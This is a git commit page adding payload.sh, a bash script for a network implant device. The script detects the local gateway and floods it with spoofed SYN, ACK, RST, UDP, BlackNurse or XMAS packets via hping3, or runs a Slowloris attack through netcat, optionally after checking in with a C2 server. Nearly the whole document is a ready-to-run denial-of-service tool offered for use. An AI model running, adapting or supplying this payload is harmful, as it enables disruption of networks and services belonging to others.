Create payload.sh
parent
7a0f36f069
commit
e950c38044
|
@ -0,0 +1,195 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: Flood Gateway (DDoS)
|
||||||
|
# Author: InfoSecREDD
|
||||||
|
# Version: 1.2
|
||||||
|
#
|
||||||
|
# Description: This payload detects the Gateway IP then proceeds to
|
||||||
|
# flood the Gateway IP by sending SYN/ACK/RST/UDP Packets or using
|
||||||
|
# SLOWLORIS/BlackNurse/XMAS Attacks. (More options to come)
|
||||||
|
#
|
||||||
|
# Common Ports to Attack: 80 (TCP), 8080(TCP), 53 (UDP), 3389 (TCP), the
|
||||||
|
# rest is up to you.
|
||||||
|
#
|
||||||
|
# Defaults to SYN Attack.
|
||||||
|
#
|
||||||
|
# LED SETUP (Magenta) Setting NETMODE and detecting GW IP.
|
||||||
|
# LED Yellow thru Magenta Waiting Ethernet Plug connection.
|
||||||
|
# LED White thru Magenta Waiting Connection to Public Website.
|
||||||
|
# LED Red Blink No Gateway IP Address, waiting 15 seconds.
|
||||||
|
# LED Red Solid No Gateway IP Address, exiting script.
|
||||||
|
# LED Cyan Blink to Solid Connected to C2. (Optional)
|
||||||
|
# LED Yellow thru Green Attacking Gateway IP with Hping3.
|
||||||
|
# LED Green Solid Attack has Finished.
|
||||||
|
#
|
||||||
|
# NOTE: SLOWLORIS Attack does NOT use the DURATION Variable. It runs until
|
||||||
|
# connections/resources run out.
|
||||||
|
#
|
||||||
|
# BlackNurse Attack does NOT use the PORT Variable. It runs against the
|
||||||
|
# ICMP(Ping) port.
|
||||||
|
#
|
||||||
|
|
||||||
|
# Type of Attack to perform.
|
||||||
|
ATTACK="SYN"
|
||||||
|
|
||||||
|
# Port to Attack.
|
||||||
|
PORT="80"
|
||||||
|
|
||||||
|
# Amount of time you wish to DDoS your Gateway. (Hint: 600 seconds is 10 minutes)
|
||||||
|
DURATION="30"
|
||||||
|
|
||||||
|
# Turn to YES if you want to connect to C2 BEFORE Attack.
|
||||||
|
C2_CONNECTION="YES"
|
||||||
|
|
||||||
|
## Settings for SLOWLORIS Attack. (Only supports HTTP Attack, NOT SSL - HTTPS)
|
||||||
|
HTTP_CONNECTIONS="200"
|
||||||
|
|
||||||
|
TEST_URL="http://www.google.com"
|
||||||
|
|
||||||
|
# Start the Script! Man your Stations!
|
||||||
|
LED SETUP;
|
||||||
|
NETMODE DHCP_CLIENT;
|
||||||
|
function net_connect() {
|
||||||
|
while ! ifconfig eth0 | grep "inet addr"; do
|
||||||
|
LED Y SOLID; sleep .2;
|
||||||
|
LED M SOLID; sleep .8;
|
||||||
|
done
|
||||||
|
|
||||||
|
while ! wget $TEST_URL -qO /dev/null; do
|
||||||
|
LED W SOLID; sleep .2;
|
||||||
|
LED M SOLID; sleep .8;
|
||||||
|
done
|
||||||
|
|
||||||
|
GATEWAY_IP=$(ip route list dev eth0 | awk ' /^default/ {print $3}')
|
||||||
|
# Detect Gateway IP, if none exit
|
||||||
|
if [ -z $GATEWAY_IP ]; then
|
||||||
|
i=0
|
||||||
|
for i in {1..15}; do
|
||||||
|
if [ "$i" -le "15" ]; then
|
||||||
|
LED R SOLID; sleep .2;
|
||||||
|
LED OFF;sleep .8;
|
||||||
|
else
|
||||||
|
LED R SOLID;
|
||||||
|
exit 0;
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
fi
|
||||||
|
if [ "$C2_CONNECTION" == "YES" ]; then
|
||||||
|
LED C VERYFAST;
|
||||||
|
C2CONNECT;
|
||||||
|
while ! pgrep cc-client; do
|
||||||
|
LED C FAST;sleep 1;
|
||||||
|
done
|
||||||
|
LED C SOLID; sleep .5;
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
net_connect;
|
||||||
|
|
||||||
|
# Prepare the Flashy Colors!
|
||||||
|
function led_attack() {
|
||||||
|
LED G SOLID; sleep .2;
|
||||||
|
LED Y SOLID; sleep .8;
|
||||||
|
}
|
||||||
|
function led_attack_dur() {
|
||||||
|
for (( i=1; i<=$DURATION; i++ )); do
|
||||||
|
LED G SOLID; sleep .2;
|
||||||
|
LED Y SOLID; sleep .8;
|
||||||
|
done
|
||||||
|
}
|
||||||
|
|
||||||
|
# Arm the platoon!
|
||||||
|
function attack() {
|
||||||
|
if [ $ATTACK = "SYN" ]; then
|
||||||
|
led_attack;
|
||||||
|
hping3 --flood -d 4096 --frag --rand-source -p $PORT -S $GATEWAY_IP &
|
||||||
|
HPING_PID=$!
|
||||||
|
led_attack_dur;
|
||||||
|
kill $HPING_PID;
|
||||||
|
fi
|
||||||
|
if [ $ATTACK = "ACK" ]; then
|
||||||
|
led_attack;
|
||||||
|
hping3 --flood -d 4096 --frag --rand-source -p $PORT -A $GATEWAY_IP &
|
||||||
|
HPING_PID=$!
|
||||||
|
led_attack_dur;
|
||||||
|
kill $HPING_PID;
|
||||||
|
fi
|
||||||
|
if [ $ATTACK = "RST" ]; then
|
||||||
|
led_attack;
|
||||||
|
hping3 --flood -d 4096 --frag --rand-source -p $PORT -R $GATEWAY_IP &
|
||||||
|
HPING_PID=$!
|
||||||
|
led_attack_dur;
|
||||||
|
kill $HPING_PID;
|
||||||
|
fi
|
||||||
|
if [ $ATTACK = "UDP" ]; then
|
||||||
|
led_attack;
|
||||||
|
hping3 --flood --udp --sign 4096 -p $PORT $GATEWAY_IP &
|
||||||
|
HPING_PID=$!
|
||||||
|
led_attack_dur;
|
||||||
|
kill $HPING_PID;
|
||||||
|
fi
|
||||||
|
if [ $ATTACK = "BLACKNURSE" ]; then
|
||||||
|
led_attack;
|
||||||
|
hping3 -1 -C 3 -K 3 --flood --rand-source $GATEWAY_IP &
|
||||||
|
HPING_PID=$!
|
||||||
|
led_attack_dur;
|
||||||
|
kill $HPING_PID;
|
||||||
|
fi
|
||||||
|
if [ $ATTACK = "XMAS" ]; then
|
||||||
|
led_attack;
|
||||||
|
hping3 --flood -d 4096 --rand-source -p $PORT -F -S -R -P -A -U -X -Y $GATEWAY_IP &
|
||||||
|
HPING_PID=$!
|
||||||
|
led_attack_dur;
|
||||||
|
kill $HPING_PID;
|
||||||
|
fi
|
||||||
|
if [ $ATTACK = "SLOWLORIS" ]; then
|
||||||
|
led_attack;
|
||||||
|
if [ "$PORT" != "80" ] || [ "$PORT" != "8080" ]; then
|
||||||
|
PORT="80"
|
||||||
|
fi
|
||||||
|
INTERVAL=$((RANDOM % 11 + 5))
|
||||||
|
i=1
|
||||||
|
while [ "$i" -le "$HTTP_CONNECTIONS" ]; do
|
||||||
|
# Use Netcat to create a keep-alive connection to the Gateway IP.
|
||||||
|
echo -e "GET / HTTP/1.1\r\nHost: $GATEWAY_IP\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i $INTERVAL -w 30000 $TARGET $PORT 2>/dev/null 1>/dev/null &
|
||||||
|
led_attack;
|
||||||
|
i=$((i + 1));
|
||||||
|
done
|
||||||
|
fi
|
||||||
|
|
||||||
|
LED FINISH
|
||||||
|
}
|
||||||
|
|
||||||
|
# Simple fix for changing arguments to CAPS
|
||||||
|
arg1=$1
|
||||||
|
ARG_FIX=$( echo "$arg1" | tr '[a-z]' '[A-Z]' )
|
||||||
|
|
||||||
|
# Start the Attack! CHHHAAARRRGGGEEE!!
|
||||||
|
if [ "$ARG_FIX" == "ACK" ]; then
|
||||||
|
ATTACK="ACK"
|
||||||
|
attack;
|
||||||
|
elif [ "$ARG_FIX" == "SYN" ]; then
|
||||||
|
ATTACK="SYN"
|
||||||
|
attack;
|
||||||
|
elif [ "$ARG_FIX" == "RST" ]; then
|
||||||
|
ATTACK="RST"
|
||||||
|
attack;
|
||||||
|
elif [ "$ARG_FIX" == "UDP" ]; then
|
||||||
|
ATTACK="UDP"
|
||||||
|
attack;
|
||||||
|
elif [ "$ARG_FIX" == "BLACKNURSE" ]; then
|
||||||
|
ATTACK="BLACKNURSE"
|
||||||
|
attack;
|
||||||
|
elif [ "$ARG_FIX" == "XMAS" ]; then
|
||||||
|
ATTACK="XMAS"
|
||||||
|
attack;
|
||||||
|
elif [ "$ARG_FIX" == "SLOWLORIS" ]; then
|
||||||
|
ATTACK="SLOWLORIS"
|
||||||
|
attack;
|
||||||
|
elif [ -z $1 ]; then
|
||||||
|
# Run ATTACK Variable from beginning of Script.
|
||||||
|
attack;
|
||||||
|
else
|
||||||
|
printf "That is not a correct Packet Attack type.\n\n Supported Types: SYN, ACK, UDP, RST, XMAS, BLACKNURSE and SLOWLORIS\n"
|
||||||
|
exit 1
|
||||||
|
fi
|
Loading…
Reference in New Issue